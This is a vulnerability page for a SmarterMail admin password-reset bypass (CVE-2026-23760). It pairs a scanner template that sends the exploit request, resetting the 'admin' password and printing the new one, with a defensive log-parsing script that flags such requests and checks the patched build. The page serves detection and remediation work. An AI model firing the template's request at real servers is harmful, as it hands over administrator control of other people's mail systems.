Vulnerability Description
Detected a SmarterMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
id: CVE-2026-23760

info:
  name: SmarterTools SmarterMail - Admin Password Reset
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    Detected a SmarterMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
  impact: |
    Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.
  remediation: |
    Upgrade to build 9511 or later.
  reference:
    - https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev

variables:
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        POST /api/v1/auth/force-reset-password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"IsSysAdmin":"true",
        "OldPassword":"watever",
        "Username":"admin",
        "NewPassword":"{{password}}",
        "ConfirmPassword": "{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - 'debugInfo'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"New Password: " + password'
# digest: 4a0a00473045022068c8b69b710124ba03bb3aadd30a747733ccafe868563b547303a5d925378c1a022100f5a88f4ea11adc343bbc579794b0b2f4d0351108d59447460052f4496e12f9a3:922c64590222798bb761d5b6d8e72950
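The template above confirms a successful reset by matching HTTP 200 together with `"success":true` in the response body. From the defender's side, the same endpoint is the thing to watch for in web-server access logs, and the remediation field gives the build to check against. The script below is an added example, not part of the template or of SmarterTools' own code: it parses constructed combined-format access-log lines (a format assumed for a reverse proxy in front of SmarterMail, not something the page documents), flags every POST to `/api/v1/auth/force-reset-password`, marks the ones that returned 200 as likely successful resets, and reports whether a given build number is at or above the fixed build 9511.

```python
import re
from typing import Dict, List, Optional

# Endpoint named in the template above; the fixed build is the one the
# template's remediation field gives (9511).
VULN_ENDPOINT = "/api/v1/auth/force-reset-password"
FIXED_BUILD = 9511

# Apache/nginx "combined" access-log format. Assumption: the proxy or web
# server in front of SmarterMail logs in this format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format access-log line; None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_reset_attempts(lines: List[str]) -> List[Dict[str, object]]:
    """Return every POST to the force-reset endpoint.

    The template's matcher treats HTTP 200 plus '"success":true' in the body
    as a confirmed reset. An access log only carries the status code, so a
    200 here is reported as a *likely* success and anything else as a failed
    or blocked attempt. Both deserve a look: this endpoint has no legitimate
    unauthenticated caller.
    """
    hits: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if path.lower() != VULN_ENDPOINT:
            continue
        hits.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "status": int(rec["status"]),
            "likely_success": rec["status"] == "200",
        })
    return hits


def is_patched(build: int) -> bool:
    """True when the installed SmarterMail build is at or above the fixed build."""
    return build >= FIXED_BUILD


# Constructed sample lines (not real traffic): one ordinary request, one
# reset attempt that was rejected, one that returned 200, one unrelated POST.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Jan/2026:09:14:02 +0000] "GET /interface/root HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jan/2026:09:15:11 +0000] "POST /api/v1/auth/force-reset-password HTTP/1.1" 403 152',
    '198.51.100.7 - - [10/Jan/2026:09:15:40 +0000] "POST /api/v1/auth/force-reset-password HTTP/1.1" 200 231',
    '203.0.113.9 - - [10/Jan/2026:09:16:00 +0000] "POST /api/v1/auth/login HTTP/1.1" 200 410',
]

if __name__ == "__main__":
    for hit in find_reset_attempts(SAMPLE_LOGS):
        flag = "LIKELY RESET" if hit["likely_success"] else "attempt"
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} {flag}')
    print("build 9511 patched:", is_patched(9511))
```

Any hit on this endpoint from before the upgrade to build 9511 should be treated as a possible administrator-credential change: verify the admin account's password and recent logins, and rotate the password if the request cannot be traced to an authorised action.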